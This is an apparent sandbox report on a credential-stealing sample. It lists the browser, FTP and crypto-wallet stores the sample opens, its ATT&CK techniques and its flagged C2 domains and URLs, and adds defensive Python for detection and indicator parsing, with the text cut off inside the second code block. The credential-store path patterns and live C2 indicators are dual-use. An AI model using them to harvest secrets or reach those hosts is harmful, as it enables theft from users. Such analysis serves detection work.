            Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhbohimaelbohpjbbldcngcnapndodjpJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ppbibelpcjmhbdihakflkdcoccbgbkpoJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aiifbnbfobpmeekipheeijimdpnlpgppJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cookies.sqliteJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\ProfilesJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nngceckbapebfimnlniiiahkandclblbJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ojggmchlghnjlapmfbnjholfjkiidbchJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ijmpgkjfkbfhoebgogflfebnmejmfbmJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\acmacodkjbdgmoleebolmdjonilkdbchJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\flpiciilemghbmfalicajoolhkkenfeJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nanjmdknhkinifnkgdcggcfnhdaammmjJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cjelfplplebdjjenllpjcblmjkfcffneJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\imloifkgjagghnncjkhggdhalmcnfklkJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jnlgamecbpmbajjfhmmmlhejkemejdmaJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\opcgpfmipidbgpenhmajoajpbobppdilJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\blnieiiffboillknjnepogjhkgnoapacJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhmfendgdocmcbmfikdcogofphimnknoJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkddgncdjgjfcddamfgcmfnlhccnimigJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fcfcfllfndlomdhbehjjcoimbgofdncgJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\gaedmjdfmmahhbjefcbgaolhhanlaolbJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ilgcnhelpchnceeipipijaljkblbcobJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\phkbamefinggmakgklpkljjmgibohnbaJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\oeljdldpnmdbchonielidgobddffflaJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\amkmjjmmflddogmhpjloimipbofnfjihJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mcohilncbfahbmgdjkbpemcciiolgcgeJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lodccjjbdhfakaekdiahmedfbieldgikJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nknhiehlklippafakaeklbeglecifhadJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jgaaimajipbpdogpdglhaphldakikgefJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dlcobpjiigpikoobohmabehhmhfoodbbJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bcopgchhojmggmffilplmbdicgaihlkpJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web DataJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hifafgmccdpekplomjjkcfgodnhcelljJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\FTPGetterJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\FTPInfoJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\SmartFTP\Client 2.0\FavoritesJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\FTPboxJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\FTPRushJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\Conceptworld\NotezillaJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile opened: C:\ProgramData\SiteDesigner\3D-FTPJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.walletJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.walletJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\Ledger LiveJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldbJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\walletsJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\walletsJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\Bitcoin\walletsJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\BinanceJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDBJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\Electrum\walletsJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\Electrum-LTC\walletsJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDBJump to behavior
            Source: C:\Users\user\Desktop\file.exe
            Directory queried (each repeatedly): C:\Users\user\Documents and its subdirectories
                C:\Users\user\Documents\DTBZGIOOSO
                C:\Users\user\Documents\DVWHKMNFNN
                C:\Users\user\Documents\HTAGVDFUIE
                C:\Users\user\Documents\JSDNGYCOWY
                C:\Users\user\Documents\NEBFQQYWPS
                C:\Users\user\Documents\NIKHQAIQAU
                C:\Users\user\Documents\ONBQCLYSPU
                C:\Users\user\Documents\QNCYCDFIJJ
                C:\Users\user\Documents\SQRKHNBNYN
                C:\Users\user\Documents\UMMBDNEQBN
                C:\Users\user\Documents\WKXEWIOTXI
                C:\Users\user\Documents\XZXHAVGRAG
            Source: Yara match, File source: Process Memory Space: file.exe PID: 7436, type: MEMORYSTR
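            The file-open and directory-query evidence above is what a host-based detection for this behaviour keys on: a single process that is not a browser reading browser login, cookie and extension stores, FTP-client directories and cryptocurrency-wallet directories within seconds of each other. The Python below is an added example written for this page, not code from the Joe Sandbox report or from the sample; it classifies file-access events (the shape an EDR or Sysmon file-event feed provides) by the path categories seen above and flags any process that touches two or more categories it does not own within a short window. The path patterns, the browser allowlist, the 5-minute window and the two-category threshold are this example's own assumptions, and the events at the bottom are constructed for it, with the file.exe paths mirroring the report's file-open list.

```python
"""Flag infostealer-style credential harvesting in file-access events.

Added example (not from the report or the sample). Input is a list of
(timestamp, process image name, path) tuples; path categories mirror the
stores the report shows file.exe opening. Thresholds, patterns and the
browser allowlist are assumptions of this example.
"""
import re
from collections import defaultdict
from datetime import datetime, timedelta

# Processes that legitimately read their own browser profile.
BROWSERS = {"chrome.exe", "msedge.exe", "firefox.exe"}

# Regexes over the normalized path (lower-case, backslash separators).
SENSITIVE = {
    "browser_login": [
        r"\\(google\\chrome|microsoft\\edge)\\user data\\[^\\]+\\login data",
        r"\\mozilla\\firefox\\profiles\\[^\\]+\\(logins\.json|key4\.db|cert9\.db)$",
    ],
    "browser_cookie": [
        r"\\user data\\[^\\]+\\network\\cookies$",
        r"\\mozilla\\firefox\\profiles\\[^\\]+\\cookies\.sqlite$",
    ],
    "browser_history": [
        r"\\user data\\[^\\]+\\(history|web data)$",
        r"\\mozilla\\firefox\\profiles\\[^\\]+\\(places|formhistory)\.sqlite$",
    ],
    "browser_extension_storage": [
        # Chrome extension IDs use only the letters a-p; wallet extensions keep state here.
        r"\\user data\\[^\\]+\\(local|sync) extension settings\\[a-p]+$",
    ],
    "crypto_wallet": [
        r"\\appdata\\roaming\\(exodus|electrum(-ltc)?|bitcoin|ledger live|atomic|binance|guarda|com\.liberty\.jaxx)(\\|$)",
        r"\\appdata\\local\\coinomi\\",
    ],
    "ftp_client": [
        r"\\appdata\\roaming\\(ftpgetter|ftpinfo|ftpbox|ftprush|smartftp)(\\|$)",
        r"\\programdata\\sitedesigner\\3d-ftp",
    ],
}
_RULES = [(cat, re.compile(p)) for cat, pats in SENSITIVE.items() for p in pats]


def normalize(path: str) -> str:
    return path.replace("/", "\\").lower().rstrip("\\")


def classify(path: str):
    """Return the sensitivity category of a path, or None if it is not a known store."""
    p = normalize(path)
    for cat, rule in _RULES:
        if rule.search(p):
            return cat
    return None


def detect(events, window=timedelta(minutes=5), min_categories=2):
    """Return {process: finding} for every process that opens stores from at least
    `min_categories` distinct categories inside one sliding `window`.
    A browser reading its own profile is ignored; any other process reading it counts.
    """
    hits = defaultdict(list)
    for ts, proc, path in sorted(events, key=lambda e: e[0]):
        cat = classify(path)
        if cat is None:
            continue
        if cat.startswith("browser_") and proc.lower() in BROWSERS:
            continue
        hits[proc.lower()].append((ts, cat, path))

    findings = {}
    for proc, seq in hits.items():
        start = 0
        for end in range(len(seq)):
            while seq[end][0] - seq[start][0] > window:  # slide the window forward
                start += 1
            span = seq[start:end + 1]
            cats = {c for _, c, _ in span}
            if len(cats) < min_categories:
                continue
            f = findings.setdefault(proc, {"categories": set(), "paths": [],
                                           "first": span[0][0], "last": span[-1][0]})
            f["categories"] |= cats
            f["last"] = span[-1][0]
            for _, _, p in span:
                if p not in f["paths"]:
                    f["paths"].append(p)
    return findings


T0 = datetime(2024, 10, 21, 12, 0, 0)
# Constructed sample events; the file.exe paths mirror the report's file-open list.
SAMPLE_EVENTS = [
    (T0 + timedelta(seconds=1), "file.exe", r"C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data For Account"),
    (T0 + timedelta(seconds=2), "file.exe", r"C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies"),
    (T0 + timedelta(seconds=3), "file.exe", r"C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\logins.json"),
    (T0 + timedelta(seconds=4), "file.exe", r"C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkbihfbeogaeaoehlefnkodbefgpgknn"),
    (T0 + timedelta(seconds=5), "file.exe", r"C:\Users\user\AppData\Roaming\Exodus\exodus.wallet"),
    (T0 + timedelta(seconds=6), "file.exe", r"C:\Users\user\AppData\Roaming\FTPGetter"),
    (T0 + timedelta(seconds=7), "file.exe", r"C:\Users\user\Documents\DTBZGIOOSO"),      # not a credential store
    (T0 + timedelta(seconds=8), "chrome.exe", r"C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data"),
    (T0 + timedelta(seconds=9), "chrome.exe", r"C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies"),
    (T0 + timedelta(minutes=30), "backup.exe", r"C:\Users\user\AppData\Roaming\Electrum\wallets"),  # one category only
]

if __name__ == "__main__":
    for proc, f in detect(SAMPLE_EVENTS).items():
        print(f"{proc}: {sorted(f['categories'])} across {len(f['paths'])} paths "
              f"between {f['first']:%H:%M:%S} and {f['last']:%H:%M:%S}")
```

            Run against the constructed events, only file.exe is reported (five categories over six paths); chrome.exe is skipped because it owns the profile it reads, and backup.exe touches a single category and stays below the threshold. The owner-process allowlist is what keeps this from firing on every browser start, and it is also the weak point: a stealer that injects into chrome.exe inherits the exemption, so pair the rule with process-injection telemetry rather than relying on it alone.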

            Remote Access Functionality

            Source: Yara match, File source: decrypted.memstr, type: MEMORYSTR
            Source: Yara match, File source: Process Memory Space: file.exe PID: 7436, type: MEMORYSTR
            Source: Yara match, File source: sslproxydump.pcap, type: PCAP
            MITRE ATT&CK matrix, listed per tactic column. A number in front of a technique is the count shown in that matrix cell of the report; techniques without a number are the matrix's unmarked placeholders.

            Reconnaissance: Gather Victim Identity Information; Credentials; Email Addresses; Employee Names; Gather Victim Network Information; Domain Properties
            Resource Development: Acquire Infrastructure; Domains; DNS Server; Virtual Private Server; Server; Botnet
            Initial Access: Valid Accounts; Default Accounts; Domain Accounts; Local Accounts; Cloud Accounts; Replication Through Removable Media
            Execution: 2 Windows Management Instrumentation; 2 Command and Scripting Interpreter; 1 PowerShell; Cron; Launchd; Scheduled Task
            Persistence: 1 DLL Side-Loading; Boot or Logon Initialization Scripts; Logon Script (Windows); Login Hook; Network Logon Script; RC Scripts
            Privilege Escalation: 1 Process Injection; 1 DLL Side-Loading; Logon Script (Windows); Login Hook; Network Logon Script; RC Scripts
            Defense Evasion: 34 Virtualization/Sandbox Evasion; 1 Process Injection; 1 Deobfuscate/Decode Files or Information; 2 Obfuscated Files or Information; 12 Software Packing; 1 DLL Side-Loading
            Credential Access: 2 OS Credential Dumping; LSASS Memory; Security Account Manager; NTDS; LSA Secrets; Cached Domain Credentials
            Discovery: 751 Security Software Discovery; 34 Virtualization/Sandbox Evasion; 2 Process Discovery; 1 File and Directory Discovery; 223 System Information Discovery; Wi-Fi Discovery
            Lateral Movement: Remote Services; Remote Desktop Protocol; SMB/Windows Admin Shares; Distributed Component Object Model; SSH; VNC
            Collection: 41 Data from Local System; Data from Removable Media; Data from Network Shared Drive; Input Capture; Keylogging; GUI Input Capture
            Command and Control: 1 Encrypted Channel; 3 Ingress Tool Transfer; 4 Non-Application Layer Protocol; 115 Application Layer Protocol; Fallback Channels; Multiband Communication
            Exfiltration: Exfiltration Over Other Network Medium; Exfiltration Over Bluetooth; Automated Exfiltration; Traffic Duplication; Scheduled Transfer; Data Transfer Size Limits
            Impact: Abuse Accessibility Features; Network Denial of Service; Data Encrypted for Impact; Data Destruction; Data Encrypted for Impact; Service Stop

            Antivirus detection for the submitted sample

            Source      Detection   Scanner          Label
            file.exe    44%         Virustotal
            file.exe    100%        Avira            TR/Crypt.TPM.Gen
            file.exe    100%        Joe Sandbox ML

            No Antivirus matches
            No Antivirus matches
            Antivirus detection for contacted domains

            Source               Detection   Scanner      Label
            steamcommunity.com   0%          Virustotal
            sergei-esenin.com    20%         Virustotal
            bathdoomgaz.store    22%         Virustotal
            spirittunek.store    22%         Virustotal
            URL reputation for URLs found in the sample and its memory (Source, Detection, Scanner, Label)

            https://duckduckgo.com/chrome_newtab  0%  URL Reputation  safe
            https://player.vimeo.com  0%  URL Reputation  safe
            https://duckduckgo.com/ac/?q=  0%  URL Reputation  safe
            https://store.steampowered.com/subscriber_agreement/  0%  URL Reputation  safe
            https://www.gstatic.cn/recaptcha/  0%  URL Reputation  safe
            http://www.valvesoftware.com/legal.htm  0%  URL Reputation  safe
            https://www.valvesoftware.com/en/contact?contact-person=Translation%20Team%20Feedback  0%  URL Reputation  safe
            https://steam.tv/  0%  URL Reputation  safe
            https://steamcommunity.com:443/profiles/76561199724331900  100%  URL Reputation  malware
            https://store.steampowered.com/points/shop/  0%  URL Reputation  safe
            https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=  0%  URL Reputation  safe
            http://crl.rootca1.amazontrust.com/rootca1.crl0  0%  URL Reputation  safe
            https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016  0%  URL Reputation  safe
            https://www.ecosia.org/newtab/  0%  URL Reputation  safe
            https://lv.queniujq.cn  0%  URL Reputation  safe
            https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br  0%  URL Reputation  safe
            https://store.steampowered.com/privacy_agreement/  0%  URL Reputation  safe
            https://checkout.steampowered.com/  0%  URL Reputation  safe
            https://store.steampowered.com/;  0%  URL Reputation  safe
            https://store.steampowered.com/about/  0%  URL Reputation  safe
            https://help.steampowered.com/en/  0%  URL Reputation  safe
            https://store.steampowered.com/news/  0%  URL Reputation  safe
            https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=  0%  URL Reputation  safe
            https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17  0%  URL Reputation  safe
            https://recaptcha.net/recaptcha/;  0%  URL Reputation  safe
            https://store.steampowered.com/stats/  0%  URL Reputation  safe
            https://medal.tv  0%  URL Reputation  safe
            https://broadcast.st.dl.eccdnx.com  0%  URL Reputation  safe
            https://store.steampowered.com/steam_refunds/  0%  URL Reputation  safe
            http://x1.c.lencr.org/0  0%  URL Reputation  safe
            http://x1.i.lencr.org/0  0%  URL Reputation  safe
            https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search  0%  URL Reputation  safe
            https://login.steampowered.com/  0%  URL Reputation  safe
            https://support.mozilla.org/products/firefoxgro.all  0%  URL Reputation  safe
Name | IP | Active | Malicious | Antivirus Detection | Reputation
steamcommunity.com | 104.102.49.254 | true | true |  | unknown
sergei-esenin.com | 104.21.53.8 | true | true |  | unknown
eaglepawnoy.store | unknown | unknown | true |  | unknown
bathdoomgaz.store | unknown | unknown | true |  | unknown
spirittunek.store | unknown | unknown | true |  | unknown
licendfilteo.site | unknown | unknown | true |  | unknown
studennotediw.store | unknown | unknown | true |  | unknown
mobbipenju.store | unknown | unknown | true |  | unknown
clearancek.site | unknown | unknown | true |  | unknown
dissapoiznw.store | unknown | unknown | true |  | unknown
Name | Malicious | Antivirus Detection | Reputation
studennotediw.store | true |  | unknown
dissapoiznw.store | true |  | unknown
https://steamcommunity.com/profiles/76561199724331900 | true |  | unknown
eaglepawnoy.store | true |  | unknown
bathdoomgaz.store | true |  | unknown
Name | Source | Malicious | Antivirus Detection | Reputation
                                                                                                                              unknown
                                                                                                                              https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=file.exe, 00000000.00000003.1719446245.0000000005BF7000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1719628135.0000000005BF9000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1719330275.0000000005C0F000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                              • URL Reputation: safe
                                                                                                                              unknown
                                                                                                                              https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17file.exe, 00000000.00000003.1718877156.0000000005C3C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                              • URL Reputation: safe
                                                                                                                              unknown
                                                                                                                              https://recaptcha.net/recaptcha/;file.exe, 00000000.00000003.1690793016.0000000001295000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                              • URL Reputation: safe
                                                                                                                              unknown
                                                                                                                              https://community.steamstatic.com/public/javascript/applications/community/manifest.js?v=r7a4-LYcQOjfile.exe, 00000000.00000003.1690568055.0000000001248000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1700607333.00000000012DB000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1690548980.00000000012D1000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1700628151.00000000012DB000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                unknown
                                                                                                                                https://dissapoiznw.store:443/apifile.exe, 00000000.00000002.1852469176.000000000124F000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1850629516.000000000124F000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1690568055.000000000124F000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1700659896.000000000124F000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                  unknown
                                                                                                                                  https://steamcommunity.com/discussions/file.exe, 00000000.00000003.1700607333.00000000012DB000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1690548980.00000000012D1000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1700628151.00000000012DB000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                    unknown
                                                                                                                                    https://sergei-esenin.com/apiwzfile.exe, 00000000.00000003.1851345687.0000000005BDD000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000002.1858209085.0000000005BDD000.00000004.00000800.00020000.00000000.sdmptrue
                                                                                                                                      unknown
                                                                                                                                      https://store.steampowered.com/stats/file.exe, 00000000.00000003.1700607333.00000000012DB000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1690548980.00000000012D1000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1700628151.00000000012DB000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                      • URL Reputation: safe
                                                                                                                                      unknown
                                                                                                                                      https://sergei-esenin.com:443/api4p.default-release/key4.dbPKfile.exe, 00000000.00000002.1852469176.000000000124F000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1850629516.000000000124F000.00000004.00000020.00020000.00000000.sdmptrue
                                                                                                                                        unknown
                                                                                                                                        https://medal.tvfile.exe, 00000000.00000003.1690793016.0000000001295000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                        • URL Reputation: safe
                                                                                                                                        unknown
                                                                                                                                        https://broadcast.st.dl.eccdnx.comfile.exe, 00000000.00000003.1690793016.0000000001295000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                        • URL Reputation: safe
                                                                                                                                        unknown
                                                                                                                                        https://store.steampowered.com/steam_refunds/file.exe, 00000000.00000003.1700607333.00000000012DB000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1690548980.00000000012D1000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1700628151.00000000012DB000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                        • URL Reputation: safe
                                                                                                                                        unknown
                                                                                                                                        https://community.steamstatic.com/public/shared/images/responsive/logo_valve_footer.pngfile.exe, 00000000.00000003.1700607333.00000000012DB000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1690548980.00000000012D1000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1700628151.00000000012DB000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                          unknown
                                                                                                                                          http://x1.c.lencr.org/0file.exe, 00000000.00000003.1752865199.0000000005CDD000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                          • URL Reputation: safe
                                                                                                                                          unknown
                                                                                                                                          http://x1.i.lencr.org/0file.exe, 00000000.00000003.1752865199.0000000005CDD000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                          • URL Reputation: safe
                                                                                                                                          unknown
                                                                                                                                          https://community.steamstatic.com/public/shared/css/buttons.css?v=-WV9f1LdxEjq&amp;l=englishfile.exe, 00000000.00000003.1700607333.00000000012DB000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1690548980.00000000012D1000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1700628151.00000000012DB000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                            unknown
                                                                                                                                            https://community.steamstatic.com/public/javascript/applications/community/libraries~b28b7af69.js?v=file.exe, 00000000.00000003.1690568055.0000000001248000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1700607333.00000000012DB000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1690548980.00000000012D1000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1700628151.00000000012DB000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                              unknown
                                                                                                                                              https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/searchfile.exe, 00000000.00000003.1719446245.0000000005BF7000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1719628135.0000000005BF9000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1719330275.0000000005C0F000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                              • URL Reputation: safe
                                                                                                                                              unknown
                                                                                                                                              https://steamcommunity.com/login/home/?goto=profiles%2F76561199724331900file.exe, 00000000.00000003.1700628151.00000000012DB000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                unknown
                                                                                                                                                https://avatars.fastly.steamstatic.com/fef49e7fa7e1997310d705b2a61file.exe, 00000000.00000003.1690548980.00000000012D1000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                  unknown
                                                                                                                                                  https://sergei-esenin.com/apiHv$file.exe, 00000000.00000003.1700659896.0000000001248000.00000004.00000020.00020000.00000000.sdmptrue
                                                                                                                                                    unknown
                                                                                                                                                    https://community.steamstatic.com/file.exe, 00000000.00000003.1700772120.0000000001283000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                      unknown
                                                                                                                                                      https://community.steamstatic.com/public/css/applications/community/main.css?v=DVae4t4RZiHA&amp;l=enfile.exe, 00000000.00000003.1690568055.0000000001248000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1700607333.00000000012DB000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1690548980.00000000012D1000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1700628151.00000000012DB000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                        unknown
                                                                                                                                                        https://clearancek.site:443/apifile.exe, 00000000.00000003.1690568055.000000000124F000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1700659896.000000000124F000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                          unknown
                                                                                                                                                          https://steamcommunity.com/workshop/file.exe, 00000000.00000003.1700607333.00000000012DB000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1690548980.00000000012D1000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1700628151.00000000012DB000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                            unknown
                                                                                                                                                            https://login.steampowered.com/file.exe, 00000000.00000003.1700772120.0000000001283000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                            • URL Reputation: safe
                                                                                                                                                            unknown
                                                                                                                                                            https://support.mozilla.org/products/firefoxgro.allfile.exe, 00000000.00000003.1754118021.0000000005EF1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                            • URL Reputation: safe
                                                                                                                                                            unknown
IP | Domain | Country | ASN | ASN Name | Malicious
104.21.53.8 | sergei-esenin.com | United States | 13335 | CLOUDFLARENET, US | true
104.102.49.254 | steamcommunity.com | United States | 16625 | AKAMAI-AS, US | true
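The URL and IP tables above are the report's raw extraction, and on this page each URL row arrives flattened: the URL, the source process name, the memory-dump IDs and the true/false Malicious column are run together without separators. The Python below is an added example, not part of the Joe Sandbox report: it parses rows in that flattened form, groups them by host, and lists the hosts the sandbox flagged together with the IP and ASN from the IP table, so a triager can separate the three flagged sergei-esenin.com hits from the Steam, Yahoo and Let's Encrypt noise and see which dumps to open. The four sample rows and the two-entry IP table are copied from this report; the regular expression and the assumption that the source process is always named file.exe are the example's own.

```python
import re
from collections import defaultdict
from urllib.parse import urlsplit

# Rows exactly as the flattened report renders them: URL, the source process
# name ("file.exe"), a comma-separated dump list and the Malicious column
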